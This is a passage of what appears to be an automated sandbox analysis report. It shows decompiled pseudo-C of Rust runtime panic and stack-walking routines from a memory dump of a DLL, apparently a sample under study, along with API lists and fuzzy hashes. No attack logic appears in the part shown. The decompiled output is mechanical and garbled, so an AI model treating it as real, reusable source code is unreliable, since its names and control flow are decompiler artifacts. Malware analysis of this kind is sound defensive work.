						 *((intOrPtr*)(_t310 + 0x4c)) = 0x6e4ed5d0;
						 *(_t310 + 0x1b) = _t208 != 0;
						 *(_t310 + 0x30) = _t310 + 0x6c;
						 *(_t310 + 0x34) = _t310 + 0x1b;
						 *((intOrPtr*)(_t310 + 0x38)) = _t310 + 0xf;
						 *((intOrPtr*)(_t310 + 0x3c)) = _t310 + 0x40;
						 *(_t310 + 0x10) = GetCurrentProcess();
						 *(_t310 + 0x24) = GetCurrentThread();
						_t307 = _t310 + 0x190;
						E6E4BC310(_t307, _t307, 0, 0x2d0);
						_t324 = _t322 + 0xc;
						_push(_t307);
						L6E4B9EEE();
						_t217 = E6E4AE690(_t265, _t307, _t310);
						__eflags = _t217;
						if(_t217 == 0) {
							_t308 =  *0x6e4fade8; // 0x0
							 *(_t310 + 0x58) = _t294;
							__eflags = _t308;
							if(_t308 == 0) {
								_t218 = GetProcAddress( *0x6e4fadd0, "SymFunctionTableAccess64");
								__eflags = _t218;
								if(__eflags == 0) {
									 *(_t310 + 0x5a8) = 3;
									E6E4C6E20(_t265, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6e4ee2c0);
									goto L70;
								} else {
									_t308 = _t218;
									 *0x6e4fade8 = _t218;
									_t267 =  *0x6e4fadec; // 0x0
									__eflags = _t267;
									if(_t267 != 0) {
										goto L41;
									} else {
										goto L39;
									}
								}
							} else {
								_t267 =  *0x6e4fadec; // 0x0
								__eflags = _t267;
								if(_t267 != 0) {
									L41:
									 *(_t310 + 0x20) = GetCurrentProcess();
									_t221 =  *0x6e4fadf8; // 0x0
									 *(_t310 + 0x1c) = _t308;
									 *(_t310 + 0x14) = _t267;
									__eflags = _t221;
									if(_t221 != 0) {
										L44:
										 *(_t310 + 0x28) = _t221;
										 *(_t310 + 0x74) = 0;
										 *(_t310 + 0x70) = 0;
										E6E4BC310(_t308, _t310 + 0x80, 0, 0x10c);
										_t324 = _t324 + 0xc;
										 *(_t310 + 0x7c) = 0;
										 *(_t310 + 0x78) =  *(_t310 + 0x248);
										 *(_t310 + 0x84) = 3;
										 *((intOrPtr*)(_t310 + 0xa8)) =  *((intOrPtr*)(_t310 + 0x254));
										 *(_t310 + 0xac) = 0;
										 *(_t310 + 0xb4) = 3;
										 *((intOrPtr*)(_t310 + 0x98)) =  *((intOrPtr*)(_t310 + 0x244));
										 *(_t310 + 0x9c) = 0;
										 *(_t310 + 0xa4) = 3;
										while(1) {
											_t227 =  *(_t310 + 0x28)(0x14c,  *(_t310 + 0x10),  *(_t310 + 0x24), _t310 + 0x78, _t310 + 0x190, 0, _t308, _t267, 0, 0);
											__eflags = _t227 - 1;
											if(_t227 != 1) {
												goto L47;
											}
											 *(_t310 + 0x188) =  *_t267( *(_t310 + 0x20),  *(_t310 + 0x78), 0);
											 *(_t310 + 0x5a8) = 3;
											_t235 = E6E4AE890(_t267, _t310 + 0x2c, _t310 + 0x70, _t308, _t310);
											_t308 =  *(_t310 + 0x1c);
											_t267 =  *(_t310 + 0x14);
											__eflags = _t235;
											if(_t235 != 0) {
												continue;
											}
											goto L47;
										}
										goto L47;
									} else {
										_t221 = GetProcAddress( *0x6e4fadd0, "StackWalkEx");
										__eflags = _t221;
										if(_t221 == 0) {
											E6E4BC310(_t308, _t310 + 0x80, 0, 0x100);
											_t324 = _t324 + 0xc;
											 *(_t310 + 0x74) = 0;
											 *(_t310 + 0x70) = 1;
											 *(_t310 + 0x188) = 0;
											 *(_t310 + 0x7c) = 0;
											 *(_t310 + 0x78) =  *(_t310 + 0x248);
											 *(_t310 + 0x84) = 3;
											 *((intOrPtr*)(_t310 + 0xa8)) =  *((intOrPtr*)(_t310 + 0x254));
											 *(_t310 + 0xac) = 0;
											 *(_t310 + 0xb4) = 3;
											 *((intOrPtr*)(_t310 + 0x98)) =  *((intOrPtr*)(_t310 + 0x244));
											 *(_t310 + 0x9c) = 0;
											 *(_t310 + 0xa4) = 3;
											do {
												_t284 =  *0x6e4fade4; // 0x0
												__eflags = _t284;
												if(_t284 != 0) {
													L63:
													_t241 =  *_t284(0x14c,  *(_t310 + 0x10),  *(_t310 + 0x24), _t310 + 0x78, _t310 + 0x190, 0, _t308, _t267, 0);
													__eflags = _t241 - 1;
													if(_t241 != 1) {
														L47:
														ReleaseMutex( *(_t310 + 0x58));
														__eflags =  *((char*)(_t310 + 0xf));
														if( *((char*)(_t310 + 0xf)) != 0) {
															goto L50;
														} else {
															goto L48;
														}
														goto L54;
													} else {
														goto L64;
													}
												} else {
													_t244 = GetProcAddress( *0x6e4fadd0, "StackWalk64");
													__eflags = _t244;
													if(__eflags == 0) {
														 *(_t310 + 0x5a8) = 3;
														E6E4C6E20(_t267, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6e4ee2c0);
														goto L70;
													} else {
														_t284 = _t244;
														 *0x6e4fade4 = _t244;
														goto L63;
													}
												}
												goto L71;
												L64:
												 *(_t310 + 0x188) =  *_t267( *(_t310 + 0x20),  *(_t310 + 0x78), 0);
												 *(_t310 + 0x5a8) = 3;
												_t243 = E6E4AE890(_t267, _t310 + 0x2c, _t310 + 0x70, _t308, _t310);
												_t308 =  *(_t310 + 0x1c);
												_t267 =  *(_t310 + 0x14);
												__eflags = _t243;
											} while (_t243 != 0);
											goto L47;
										} else {
											 *0x6e4fadf8 = _t221;
											goto L44;
										}
									}
								} else {
									L39:
									_t246 = GetProcAddress( *0x6e4fadd0, "SymGetModuleBase64");
									__eflags = _t246;
									if(__eflags == 0) {
										 *(_t310 + 0x5a8) = 3;
										E6E4C6E20(_t267, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6e4ee2c0);
										L70:
										asm("ud2");
										_push(_t313);
										return E6E4AE880( *((intOrPtr*)( &_v1456 + 0x58)));
									} else {
										_t267 = _t246;
										 *0x6e4fadec = _t246;
										goto L41;
									}
								}
							}
						} else {
							__eflags =  *((char*)(_t310 + 0xf));
							if( *((char*)(_t310 + 0xf)) != 0) {
								goto L50;
							} else {
								L48:
								__eflags =  *(_t310 + 0xe);
								if( *(_t310 + 0xe) != 0) {
									L55:
									_t229 =  *(_t310 + 0x5c);
									__eflags = _t229;
									if(_t229 != 0) {
										__eflags =  *(_t310 + 0x60);
										if( *(_t310 + 0x60) != 0) {
											HeapFree( *0x6e4fadc8, 0, _t229);
										}
									}
									_t206 = 0;
								} else {
									 *(_t310 + 0x190) = 0x6e4ed63c;
									 *(_t310 + 0x194) = 1;
									 *(_t310 + 0x198) = 0;
									 *((intOrPtr*)(_t310 + 0x1a0)) = 0x6e4ecd60;
									 *(_t310 + 0x1a4) = 0;
									 *(_t310 + 0x5a8) = 2;
									_push(_t310 + 0x190);
									_t233 = E6E4A2320( *((intOrPtr*)(_a8 + 0x18)),  *(_a8 + 0x1c));
									__eflags = _t233;
									if(_t233 == 0) {
										goto L55;
									} else {
										goto L50;
									}
								}
							}
							L54:
							 *[fs:0x0] =  *((intOrPtr*)(_t310 + 0x5a0));
							return _t206;
						}
					}
				}
				L71:
			}



















































                          0x6e4adee3
                          0x6e4adee4
                          0x6e4adee5
                          0x6e4adee9
                          0x6e4adeef
                          0x6e4adef1
                          0x6e4adef7
                          0x6e4adefd
                          0x6e4adf07
                          0x6e4adf21
                          0x6e4adf27
                          0x6e4adf2e
                          0x6e4adf30
                          0x6e4adf33
                          0x6e4adf44
                          0x6e4adf49
                          0x6e4adf4c
                          0x6e4adf51
                          0x6e4adf56
                          0x6e4adf5d
                          0x6e4adf60
                          0x6e4adf67
                          0x6e4adf6a
                          0x6e4adf77
                          0x6e4adf7a
                          0x6e4adf96
                          0x6e4adf96
                          0x6e4adf9c
                          0x6e4adfa0
                          0x6e4adfa2
                          0x6e4adfa4
                          0x6e4adfae
                          0x6e4adfb2
                          0x6e4adfb7
                          0x6e4adfbd
                          0x6e4adfbd
                          0x6e4adfc0
                          0x6e4adfc3
                          0x6e4adfc6
                          0x6e4adfc9
                          0x6e4adfcc
                          0x6e4adfcf
                          0x6e4adf7c
                          0x6e4adfe0
                          0x6e4adfe0
                          0x6e4adfe6
                          0x6e4adfed
                          0x6e4adfed
                          0x6e4adff0
                          0x6e4adff2
                          0x6e4adffa
                          0x6e4ae000
                          0x6e4ae004
                          0x6e4ae012
                          0x6e4adf80
                          0x6e4adf83
                          0x6e4adf85
                          0x6e4ae03d
                          0x6e4ae040
                          0x6e4ae04a
                          0x6e4ae04c
                          0x6e4ae568
                          0x00000000
                          0x6e4ae052
                          0x6e4ae052
                          0x6e4ae055
                          0x6e4ae058
                          0x6e4ae059
                          0x6e4ae05e
                          0x6e4ae064
                          0x6e4ae069
                          0x6e4ae06b
                          0x6e4ae06e
                          0x6e4ae073
                          0x6e4ae076
                          0x6e4ae078
                          0x00000000
                          0x00000000
                          0x6e4ae07a
                          0x00000000
                          0x6e4ae078
                          0x6e4adf8b
                          0x6e4adf8b
                          0x6e4adf91
                          0x6e4adf94
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4adf94
                          0x6e4ae027
                          0x6e4ae02a
                          0x6e4ae032
                          0x6e4ae035
                          0x00000000
                          0x6e4ae03b
                          0x00000000
                          0x6e4ae03b
                          0x00000000
                          0x6e4ae035
                          0x6e4ae07c
                          0x6e4ae07c
                          0x6e4ae082
                          0x6e4ae084
                          0x6e4ae087
                          0x6e4ae08e
                          0x6e4ae091
                          0x6e4ae093
                          0x6e4ae095
                          0x6e4ae095
                          0x6e4ae099
                          0x6e4ae09b
                          0x6e4ae0a0
                          0x6e4ae0ad
                          0x6e4ae0ad
                          0x6e4ae0a0
                          0x6e4ae099
                          0x6e4ae0b2
                          0x6e4ae0b2
                          0x6e4ae0b4
                          0x6e4ae11e
                          0x6e4ae121
                          0x6e4ae124
                          0x6e4ae127
                          0x6e4ae12a
                          0x6e4ae0b6
                          0x6e4ae0b6
                          0x6e4ae0ba
                          0x6e4ae0bc
                          0x6e4ae0c1
                          0x6e4ae0c7
                          0x6e4ae0d2
                          0x6e4ae0d4
                          0x6e4ae0d7
                          0x6e4ae0da
                          0x6e4ae0dd
                          0x6e4ae0e1
                          0x6e4ae0e3
                          0x6e4ae0e5
                          0x6e4ae0e9
                          0x6e4ae0eb
                          0x6e4ae0eb
                          0x6e4ae0f7
                          0x6e4ae0fc
                          0x6e4ae0fc
                          0x6e4ae108
                          0x6e4ae108
                          0x6e4ae10d
                          0x6e4ae110
                          0x6e4ae112
                          0x6e4ae112
                          0x6e4ae134
                          0x6e4ae137
                          0x6e4ae13d
                          0x6e4ae140
                          0x6e4ae143
                          0x6e4ae14d
                          0x6e4ae157
                          0x6e4ae161
                          0x6e4ae16b
                          0x6e4ae178
                          0x6e4ae181
                          0x6e4ae182
                          0x6e4ae187
                          0x6e4ae18a
                          0x6e4ae18c
                          0x6e4ae405
                          0x6e4ae405
                          0x6e4ae408
                          0x6e4ae40a
                          0x6e4ae40c
                          0x6e4ae410
                          0x6e4ae41b
                          0x6e4ae41b
                          0x6e4ae410
                          0x6e4ae420
                          0x00000000
                          0x6e4ae192
                          0x6e4ae192
                          0x6e4ae198
                          0x6e4ae19f
                          0x6e4ae1a3
                          0x6e4ae1a6
                          0x6e4ae1ad
                          0x6e4ae1af
                          0x6e4ae1b8
                          0x6e4ae1be
                          0x6e4ae1c1
                          0x6e4ae1c8
                          0x6e4ae1cc
                          0x6e4ae1d2
                          0x6e4ae1d8
                          0x6e4ae1de
                          0x6e4ae1e6
                          0x6e4ae1ef
                          0x6e4ae1f9
                          0x6e4ae200
                          0x6e4ae205
                          0x6e4ae208
                          0x6e4ae209
                          0x6e4ae20e
                          0x6e4ae213
                          0x6e4ae215
                          0x6e4ae226
                          0x6e4ae22c
                          0x6e4ae22f
                          0x6e4ae231
                          0x6e4ae24a
                          0x6e4ae250
                          0x6e4ae252
                          0x6e4ae595
                          0x6e4ae5ae
                          0x00000000
                          0x6e4ae258
                          0x6e4ae258
                          0x6e4ae25a
                          0x6e4ae25f
                          0x6e4ae265
                          0x6e4ae267
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4ae267
                          0x6e4ae233
                          0x6e4ae233
                          0x6e4ae239
                          0x6e4ae23b
                          0x6e4ae289
                          0x6e4ae28e
                          0x6e4ae291
                          0x6e4ae296
                          0x6e4ae299
                          0x6e4ae29c
                          0x6e4ae29e
                          0x6e4ae2be
                          0x6e4ae2be
                          0x6e4ae2c7
                          0x6e4ae2ce
                          0x6e4ae2dd
                          0x6e4ae2e2
                          0x6e4ae2f7
                          0x6e4ae2fe
                          0x6e4ae301
                          0x6e4ae30b
                          0x6e4ae311
                          0x6e4ae31b
                          0x6e4ae325
                          0x6e4ae32b
                          0x6e4ae335
                          0x6e4ae340
                          0x6e4ae35e
                          0x6e4ae361
                          0x6e4ae364
                          0x00000000
                          0x00000000
                          0x6e4ae376
                          0x6e4ae37c
                          0x6e4ae386
                          0x6e4ae38b
                          0x6e4ae38e
                          0x6e4ae391
                          0x6e4ae393
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4ae393
                          0x00000000
                          0x6e4ae2a0
                          0x6e4ae2ab
                          0x6e4ae2b1
                          0x6e4ae2b3
                          0x6e4ae464
                          0x6e4ae469
                          0x6e4ae47e
                          0x6e4ae485
                          0x6e4ae48c
                          0x6e4ae496
                          0x6e4ae49d
                          0x6e4ae4a0
                          0x6e4ae4aa
                          0x6e4ae4b0
                          0x6e4ae4ba
                          0x6e4ae4c4
                          0x6e4ae4ca
                          0x6e4ae4d4
                          0x6e4ae4e0
                          0x6e4ae4e0
                          0x6e4ae4e6
                          0x6e4ae4e8
                          0x6e4ae506
                          0x6e4ae522
                          0x6e4ae524
                          0x6e4ae527
                          0x6e4ae395
                          0x6e4ae398
                          0x6e4ae39d
                          0x6e4ae3a1
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4ae4ea
                          0x6e4ae4f5
                          0x6e4ae4fb
                          0x6e4ae4fd
                          0x6e4ae572
                          0x6e4ae58b
                          0x00000000
                          0x6e4ae4ff
                          0x6e4ae4ff
                          0x6e4ae501
                          0x00000000
                          0x6e4ae501
                          0x6e4ae4fd
                          0x00000000
                          0x6e4ae52d
                          0x6e4ae53d
                          0x6e4ae543
                          0x6e4ae54d
                          0x6e4ae552
                          0x6e4ae555
                          0x6e4ae558
                          0x6e4ae558
                          0x00000000
                          0x6e4ae2b9
                          0x6e4ae2b9
                          0x00000000
                          0x6e4ae2b9
                          0x6e4ae2b3
                          0x6e4ae23d
                          0x6e4ae269
                          0x6e4ae274
                          0x6e4ae27a
                          0x6e4ae27c
                          0x6e4ae5b8
                          0x6e4ae5d1
                          0x6e4ae5d9
                          0x6e4ae5d9
                          0x6e4ae5e0
                          0x6e4ae5fc
                          0x6e4ae282
                          0x6e4ae282
                          0x6e4ae284
                          0x00000000
                          0x6e4ae284
                          0x6e4ae27c
                          0x6e4ae23b
                          0x6e4ae217
                          0x6e4ae217
                          0x6e4ae21b
                          0x00000000
                          0x6e4ae221
                          0x6e4ae3a3
                          0x6e4ae3a3
                          0x6e4ae3a7
                          0x6e4ae437
                          0x6e4ae437
                          0x6e4ae43a
                          0x6e4ae43c
                          0x6e4ae43e
                          0x6e4ae442
                          0x6e4ae44d
                          0x6e4ae44d
                          0x6e4ae442
                          0x6e4ae452
                          0x6e4ae3ad
                          0x6e4ae3b0
                          0x6e4ae3ba
                          0x6e4ae3c4
                          0x6e4ae3ce
                          0x6e4ae3d8
                          0x6e4ae3e2
                          0x6e4ae3f8
                          0x6e4ae3f9
                          0x6e4ae401
                          0x6e4ae403
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4ae403
                          0x6e4ae3a7
                          0x6e4ae422
                          0x6e4ae428
                          0x6e4ae436
                          0x6e4ae436
                          0x6e4ae215
                          0x6e4ae18c
                          0x00000000

                          APIs
                          • SetLastError.KERNEL32(00000000), ref: 6E4ADFF2
                          • GetCurrentDirectoryW.KERNEL32(?,?), ref: 6E4ADFFA
                          • GetLastError.KERNEL32 ref: 6E4AE006
                          • GetLastError.KERNEL32 ref: 6E4AE018
                          • GetLastError.KERNEL32 ref: 6E4AE07C
                          • HeapFree.KERNEL32(00000000,00000000), ref: 6E4AE0AD
                          • HeapFree.KERNEL32(00000000,?), ref: 6E4AE0F7
                          • HeapFree.KERNEL32(00000000,?), ref: 6E4AE108
                          • GetCurrentProcess.KERNEL32(?), ref: 6E4AE1E1
                          • GetCurrentThread.KERNEL32 ref: 6E4AE1E9
                          • RtlCaptureContext.KERNEL32(?), ref: 6E4AE209
                          • GetProcAddress.KERNEL32(SymFunctionTableAccess64,?), ref: 6E4AE24A
                          • GetProcAddress.KERNEL32(SymGetModuleBase64), ref: 6E4AE274
                          • GetCurrentProcess.KERNEL32 ref: 6E4AE289
                          • GetProcAddress.KERNEL32(StackWalkEx), ref: 6E4AE2AB
                          • ReleaseMutex.KERNEL32(?), ref: 6E4AE398
                          • HeapFree.KERNEL32(00000000,?), ref: 6E4AE41B
                          • HeapFree.KERNEL32(00000000,?,?), ref: 6E4AE44D
                          • GetProcAddress.KERNEL32(StackWalk64), ref: 6E4AE4F5
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: FreeHeap$AddressCurrentErrorLastProc$Process$CaptureContextDirectoryMutexReleaseThread
                          • String ID: StackWalk64$StackWalkEx$SymFunctionTableAccess64$SymGetModuleBase64$called `Option::unwrap()` on a `None` value
                          • API String ID: 1381040140-1036201984
                          • Opcode ID: 8f6f8daf1b09bf59cba4eb71d66dc03a4f4173e05f02fb0016601b8c9748a43a
                          • Instruction ID: a56b7e44f3f14a25e88bce43fee0902935f0cd9e33a92b9be8803eecdbc2044e
                          • Opcode Fuzzy Hash: 8f6f8daf1b09bf59cba4eb71d66dc03a4f4173e05f02fb0016601b8c9748a43a
                          • Instruction Fuzzy Hash: 3D1245B0600B009FE760CFB9D884B93BBE5BF59718F00491ED6AA8BA84D771B445CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4AC8C0, Relevance: 33.7, APIs: 14, Strings: 5, Instructions: 477memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 69%
                          			E6E4AC8C0(long _a4, signed int _a8) {
				void* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				char _v41;
				long _v48;
				long* _v52;
				intOrPtr _v56;
				long _v60;
				void _v64;
				long* _v68;
				long _v72;
				char _v76;
				long* _v80;
				void* _v84;
				char _v88;
				long _v92;
				char* _v96;
				long _v100;
				void* _v104;
				void** _v108;
				void* _v112;
				long _v116;
				void* _v120;
				long _v124;
				char _v128;
				intOrPtr _v132;
				void _v136;
				void* _v140;
				intOrPtr _v144;
				signed int _v148;
				intOrPtr _v152;
				intOrPtr* _t190;
				void* _t194;
				void _t195;
				intOrPtr* _t196;
				signed int _t197;
				signed int _t199;
				char* _t201;
				long _t202;
				long _t203;
				void* _t204;
				void* _t205;
				long _t206;
				void _t209;
				void _t210;
				void* _t219;
				void* _t222;
				long _t226;
				void* _t235;
				void* _t245;
				void* _t247;
				void* _t248;
				char** _t251;
				char** _t252;
				void* _t256;
				void* _t260;
				void _t264;
				char _t265;
				signed char _t267;
				void _t270;
				intOrPtr _t273;
				void* _t275;
				char* _t276;
				void _t277;
				void* _t280;
				intOrPtr _t291;
				intOrPtr _t295;
				void _t298;
				long _t302;
				void* _t307;
				void* _t308;
				void* _t309;
				signed int _t310;
				signed int _t312;
				void* _t318;
				intOrPtr* _t324;
				long _t326;
				void* _t327;
				void* _t330;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				void* _t335;
				intOrPtr _t336;
				void* _t347;
				void* _t360;
				long _t361;

				_v32 = _t336;
				_v20 = 0xffffffff;
				_v24 = E6E4B3B50;
				_t264 = _t270;
				_t332 = 1;
				_t330 = _t307;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				asm("lock xadd [0x6e4fadc0], esi");
				_t190 = E6E4AD1B0(_t264, _t330);
				_t337 = _t190;
				if(_t190 == 0) {
					_t190 = E6E4C6EE0(_t264,  &M6E4ED0E7, 0x46, _t337,  &_v68, 0x6e4ed060, 0x6e4ed1ac);
					_t336 = _t336 + 0xc;
					asm("ud2");
				}
				_t308 = _a8;
				_t273 =  *_t190 + 1;
				 *_t190 = _t273;
				if(_t332 < 0 || _t273 >= 3) {
					__eflags = _t273 - 2;
					if(__eflags <= 0) {
						_v124 = 0x6e4ecd60;
						_v120 = 0x6e4ed014;
						_v68 = 0x6e4eda50;
						_v64 = 2;
						_v96 = 0;
						_v100 = 0;
						_v60 = 0;
						_v116 = _a4;
						_v112 = _t308;
						_t309 =  &_v68;
						_v80 =  &_v124;
						_v76 = E6E4A2640;
						_v52 =  &_v80;
						_v48 = 1;
						_t194 = E6E4AD2A0( &_v100, __eflags);
						__eflags = _t194 - 3;
						if(_t194 == 3) {
							_v20 = 0;
							_v36 = _t309;
							 *((intOrPtr*)( *((intOrPtr*)(_t309 + 4))))( *_t309);
							_t336 = _t336 + 4;
							L11:
							_t332 = _v36;
							_t302 =  *(_t332 + 4);
							__eflags =  *(4 + _t302);
							if( *(4 + _t302) != 0) {
								_t256 =  *_t332;
								__eflags =  *((intOrPtr*)(_t302 + 8)) - 9;
								if( *((intOrPtr*)(_t302 + 8)) >= 9) {
									_t256 =  *(_t256 - 4);
								}
								HeapFree( *0x6e4fadc8, 0, _t256);
							}
							_t194 = HeapFree( *0x6e4fadc8, 0, _t332);
						}
						goto L16;
					}
					_t327 =  &_v68;
					_v68 = 0x6e4eda14;
					_v64 = 1;
					_v60 = 0;
					_v52 = 0x6e4ecd60;
					_v120 = 0;
					_v124 = 0;
					_v48 = 0;
					_t194 = E6E4AD2A0( &_v124, __eflags);
					__eflags = _t194 - 3;
					if(_t194 != 3) {
						goto L16;
					} else {
						_v20 = 1;
						_v36 = _t327;
						 *((intOrPtr*)( *((intOrPtr*)(_t327 + 4))))( *_t327);
						_t336 = _t336 + 4;
						goto L11;
					}
				} else {
					_v132 = _t273;
					__imp__AcquireSRWLockShared(0x6e4fadbc);
					_v144 = 0x6e4fadbc;
					_v20 = 2;
					_v136 = _t264;
					_v140 = _t330;
					_t260 =  *((intOrPtr*)(_t330 + 0x10))(_t264);
					_t336 = _t336 + 4;
					_v36 = _t260;
					_v40 = _t308;
					_t194 = E6E4AD1B0(_t264, _t330);
					_t330 = _v40;
					_t340 = _t194;
					if(_t194 != 0) {
						L17:
						__eflags =  *_t194 - 1;
						_t275 = 1;
						if( *_t194 <= 1) {
							_t195 =  *0x6e4fadb0; // 0x0
							_t310 = _a8;
							__eflags = _t195 - 2;
							if(_t195 == 2) {
								_t275 = 0;
								goto L19;
							}
							__eflags = _t195 - 1;
							if(_t195 == 1) {
								_t275 = 4;
								goto L19;
							}
							__eflags = _t195;
							if(_t195 != 0) {
								goto L19;
							}
							E6E4AD530(_t264,  &_v68, _t330, _t332);
							_t330 = _v40;
							_t248 = _v68;
							__eflags = _t248;
							if(_t248 != 0) {
								goto L68;
							}
							_t267 = 5;
							goto L86;
						}
						_t310 = _a8;
						goto L19;
					} else {
						E6E4C6EE0(_t264,  &M6E4ED0E7, 0x46, _t340,  &_v68, 0x6e4ed060, 0x6e4ed1ac);
						_t336 = _t336 + 0xc;
						L61:
						asm("ud2");
						L62:
						_t276 = "Box<dyn Any><unnamed>thread \'\' panicked at \'\', ";
						_t201 = 0xc;
						L21:
						_v100 = _t276;
						_v96 = _t201;
						_t202 =  *0x6e4fa044; // 0x0
						if(_t202 == 0) {
							_t280 = 0x6e4fa044;
							_t202 = E6E4B2B10(_t264, 0x6e4fa044, _t330, _t332);
						}
						_t194 = TlsGetValue(_t202);
						if(_t194 <= 1) {
							L42:
							_t203 =  *0x6e4fa044; // 0x0
							__eflags = _t203;
							if(_t203 == 0) {
								_t280 = 0x6e4fa044;
								_t203 = E6E4B2B10(_t264, 0x6e4fa044, _t330, _t332);
							}
							_t194 = TlsGetValue(_t203);
							__eflags = _t194;
							if(_t194 == 0) {
								_t204 =  *0x6e4fadc8; // 0xb00000
								__eflags = _t204;
								if(_t204 != 0) {
									L66:
									_t205 = HeapAlloc(_t204, 0, 0x10);
									__eflags = _t205;
									if(__eflags != 0) {
										 *_t205 = 0;
										 *(_t205 + 0xc) = 0x6e4fa044;
										_t332 = _t205;
										_t206 =  *0x6e4fa044; // 0x0
										__eflags = _t206;
										if(_t206 == 0) {
											_v36 = _t332;
											_t206 = E6E4B2B10(_t264, 0x6e4fa044, _t330, _t332);
											_t332 = _v36;
										}
										_t194 = TlsSetValue(_t206, _t332);
										goto L75;
									}
									L67:
									_t248 = E6E4C6C30(_t264, 0x10, 4, _t330, _t332, __eflags);
									asm("ud2");
									L68:
									_t326 = _v60;
									_t298 = _v64;
									__eflags = _t326 - 4;
									if(_t326 == 4) {
										__eflags =  *_t248 - 0x6c6c7566;
										if( *_t248 != 0x6c6c7566) {
											L83:
											_t332 = 2;
											_t267 = 0;
											__eflags = 0;
											L84:
											__eflags = _t298;
											if(_t298 != 0) {
												HeapFree( *0x6e4fadc8, 0, _t248);
											}
											L86:
											__eflags = _t267 - 5;
											_t310 = _a8;
											_t269 =  !=  ? _t332 : 1;
											_t275 =  !=  ? _t267 & 0x000000ff : 4;
											_t142 =  !=  ? _t332 : 1;
											_t264 =  *0x6e4fadb0;
											 *0x6e4fadb0 =  !=  ? _t332 : 1;
											L19:
											_v148 = _t310;
											_v128 = _t275;
											_t59 = _t330 + 0xc; // 0x6e4b3440
											_t196 =  *_t59;
											_v40 = _t196;
											_t197 =  *_t196(_v36);
											_t336 = _t336 + 4;
											_t312 = _t310 ^ 0x7ef2a91e | _t197 ^ 0xecc7bcf4;
											__eflags = _t312;
											if(__eflags != 0) {
												_t199 = _v40(_v36);
												_t336 = _t336 + 4;
												__eflags = _t312 ^ 0xe43a67d8 | _t199 ^ 0xbae7a625;
												if(__eflags != 0) {
													goto L62;
												}
												_t251 = _v36;
												_t276 =  *_t251;
												_t201 = _t251[2];
												goto L21;
											}
											_t252 = _v36;
											_t276 =  *_t252;
											_t201 = _t252[1];
											goto L21;
										}
										_t267 = 1;
										_t332 = 3;
										goto L84;
									}
									__eflags = _t326 - 1;
									if(_t326 != 1) {
										goto L83;
									}
									__eflags =  *_t248 - 0x30;
									if( *_t248 != 0x30) {
										goto L83;
									}
									_t267 = 4;
									_t332 = 1;
									goto L84;
								}
								_t204 = GetProcessHeap();
								__eflags = _t204;
								if(__eflags == 0) {
									goto L67;
								}
								 *0x6e4fadc8 = _t204;
								goto L66;
							} else {
								_t332 = _t194;
								__eflags = _t194 - 1;
								if(_t194 != 1) {
									L75:
									_t277 =  *(_t332 + 8);
									__eflags =  *_t332;
									_t136 = _t332 + 4; // 0x4
									_t330 = _t136;
									 *_t332 = 1;
									 *(_t332 + 4) = 0;
									 *(_t332 + 8) = 0;
									if(__eflags != 0) {
										__eflags = _t277;
										if(__eflags != 0) {
											asm("lock dec dword [ecx]");
											if(__eflags == 0) {
												_t194 = E6E4AC800(_t277);
											}
										}
									}
									goto L26;
								}
								_v84 = 0;
								_v36 = 0;
								_t210 = 0;
								__eflags = 0;
								goto L47;
							}
						} else {
							_t330 = _t194;
							if( *_t194 != 1) {
								goto L42;
							}
							_t330 = _t330 + 4;
							L26:
							if( *_t330 != 0) {
								E6E4C6EE0(_t264, "already borrowedC:tyampmimkkfvlytcfjjwzprktkelbfiygduxwusohmhocuefyyefupvncdqxnbdzpobcxrxttvayruifzxzewqpnxdhtoqxvhptxvtuswthpfrwnzpmyamwgyjpl", 0x10, __eflags,  &_v68, 0x6e4ed050, 0x6e4ed720);
								_t336 = _t336 + 0xc;
								goto L61;
							}
							 *_t330 = 0xffffffff;
							_t332 =  *(_t330 + 4);
							if(_t332 == 0) {
								_v36 = _t330;
								_v20 = 8;
								_t247 = E6E4AC690(_t264, _t330, _t332);
								_t330 = _v36;
								_t332 = _t247;
								_t194 =  *(_t330 + 4);
								_t347 = _t194;
								if(_t347 != 0) {
									asm("lock dec dword [eax]");
									if(_t347 == 0) {
										_t280 =  *(_t330 + 4);
										_t194 = E6E4AC800(_t280);
									}
								}
								 *(_t330 + 4) = _t332;
							}
							asm("lock inc dword [esi]");
							if(_t347 <= 0) {
								L16:
								asm("ud2");
								asm("ud2");
								goto L17;
							} else {
								 *_t330 =  *_t330 + 1;
								_v84 = _t332;
								_v36 = _t332;
								if(_t332 != 0) {
									_t209 =  *(_t332 + 0x10);
									__eflags = _t209;
									_t280 =  ==  ? _t209 : _t332 + 0x10;
									if(__eflags != 0) {
										L103:
										_t210 =  *_t280;
										_t280 =  *((intOrPtr*)(_t280 + 4)) - 1;
										L104:
										_v20 = 3;
										L47:
										_v124 = 0x6e4ed8fc;
										_v120 = 4;
										_v72 = 0;
										_v88 = 0;
										_v92 = 0;
										_v116 = 0;
										_v20 = 3;
										_t317 =  !=  ? _t210 : "<unnamed>thread \'\' panicked at \'\', ";
